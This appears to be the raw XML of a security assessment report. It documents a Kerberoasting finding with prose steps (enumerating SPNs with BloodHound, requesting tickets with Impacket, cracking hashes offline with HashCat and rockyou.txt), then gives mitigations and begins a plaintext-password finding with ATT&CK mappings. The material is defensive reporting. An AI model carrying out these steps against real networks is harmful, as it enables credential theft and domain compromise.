          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the ser</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="68B49C09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ver</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6D82F27F">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6D82F27F">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6D82F27F">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not have randomized or secure service account passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E99F7FB">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24185A33">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is the default configuration,</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5E99F7F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the attac</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ker </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A353543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0A35354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take </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5C4096F5">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1B1DCEE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stolen hashes</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offline and use brute-force techniques to crack the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25B84427">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> plain</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25B84427">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>te</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25B84427">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xt</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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0EE7B02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38FD51F5" w14:textId="775EB6D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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="1A98950D" w14:textId="2E6C95F4">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C922FB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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="5DAC2585" w14:textId="65A2CD49">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an adversary to compromise a service account, which can lead to a data breach, lateral movement across the network, and potential domain compromise if the account has high privileges. They can also cause severe operational disruption by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modifying</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the service that the service account controls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="02F4426D" w14:textId="2FE8F3DF">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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="776B34A0" w14:textId="3E31A19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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="6B33B5F2" w14:textId="566AE7F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Enumerate</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the Active Directory for accounts with Service Principal Names (SPNs) via Bloodhound.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="74ACCE65" w14:textId="01346A4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Step 2: Request service tickets for the discovered SPN accounts using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GetUserSPNs</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Impacket</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="31554962" w14:textId="708163C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Step 3: Export the tickets to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="790B56F2" w14:textId="58E2925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Step 4: Crack the ticket hashes offline using a tool like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HashCat</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and wordlist like rockyou.txt to recover the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1A5A67A5" w14:textId="19E9F80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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="08CC3F8E" w14:textId="6B4E1F1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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="1AD291E6" w14:textId="325F54F2">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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="44B083BB" w14:textId="25959DE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 xml:space="preserve">Enforce a strong password policy for all service accounts to prevent hash cracking after </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Kerberoasting</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="2274E211" w14:textId="78B49455">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Disallow user accounts from having a Service Principal Name (SPN) and implement the principle of least privilege to limit service account permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="1601189B" w14:textId="0B50206D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="0177A091" w14:textId="04E4BCE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C922FB9" w:rsidP="0D325B6E" w:rsidRDefault="0C922FB9" w14:paraId="123F956C" w14:textId="4868845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C922FB9">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AF66599" w:rsidP="0D325B6E" w:rsidRDefault="1AF66599" w14:paraId="472F9448" w14:textId="369E76D7">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="Rc286085b6de84b2e">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1AF66599">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>Microsoft Security - Microsoft’s guidance to help mitigate Kerberoasting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="17F8567A" w14:textId="673E4503">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:beforeAutospacing="off" w:after="80" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39AB4EA9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="39AB4EA9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1: Plaintext Passwords in Database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16A4094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6862D16" w14:textId="1F45F7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10B17B7" w14:textId="6D440D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587D83D" w14:textId="6A0AC6F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3584D14">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BBF895" w14:textId="5D5090B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C31A939" w14:textId="1403B22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1082205" w14:textId="12490CE0">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6.8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7698497" w14:textId="5CB44D98">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3737B5B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CEB1A3" w14:textId="20278D5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9BABCD5" w14:textId="70CCF7AC">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910FFC4"/>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1FABCD9"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="006DA5F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5696F6A" w14:textId="67940CD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404D703" w14:textId="650A1F66">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" r:id="R4af9037c510242ad">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L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VA:N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SC:N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20D1B370">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9B85A4" w14:textId="387F5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93BA57" w14:textId="4F24597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544F402" w:rsidP="0D325B6E" w:rsidRDefault="3544F402" w14:paraId="4630502B" w14:textId="30EFD49C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R9f8377a2fa2d4b26">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3544F402">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1555: Credentials from Password Stores</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="577DF7C7" w14:textId="439B1AC3">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Re4b58c4a232c4983">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1552: Unsecured Credentials</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="28271320" w14:textId="716B41E4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rdaa6b47644f94a48">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1005</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">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Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6DF96607">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683D5DA"/>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874306" w14:textId="1D6D1C5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D5B1E86" w14:textId="785D56C0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R452816854bb940e7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M10</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>41: Encrypt Sensitive Information</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="19F41478">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370FCD5" w14:textId="2BEB1093">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72936CC" w14:textId="563C0AA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BD37D59" w14:textId="1F3306BC">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="39AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="152A4F26" w14:textId="1C24E41C">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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="495B1DDE" w14:textId="23108A5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Passwords in the database are stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03041E99">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plaintext,</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attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A64F257">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that gain </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A64F257">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A64F257">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A64F257">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7A64F25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4C13B526">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he ability </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4C13B526">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</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easily </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28F6BA2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28F6BA2B">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28F6BA2B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="28F6BA2B">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28F6BA2B">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 xml:space="preserve">d </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til</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ze</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61EA733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user passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="44AD1949" w14:textId="739825A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9AB4EA9" w:rsidP="0D325B6E" w:rsidRDefault="39AB4EA9" w14:paraId="779A8116" w14:textId="2C36BF1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043D2E1" w:rsidP="0D325B6E" w:rsidRDefault="0043D2E1" w14:paraId="5A6F2F76" w14:textId="42531E8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43D2E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71B5395F">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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="09FE2B18">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71B5395F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> com</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60439950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">promise any user account in the database without the need to crack the hashes of the passwords before </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="60439950">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>us</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5A50FC48">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A50FC48">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1273ACA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C5E2AF3">
        <w:rPr>
